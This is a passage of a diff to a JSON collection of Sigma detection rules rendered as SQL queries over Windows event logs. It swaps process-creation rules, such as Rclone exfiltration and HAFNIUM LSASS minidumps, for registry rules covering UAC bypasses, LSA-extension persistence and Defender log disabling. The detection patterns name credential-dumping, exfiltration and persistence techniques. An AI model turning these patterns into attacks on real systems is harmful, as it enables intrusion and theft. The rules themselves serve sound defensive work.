User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - "Software installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR (ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE 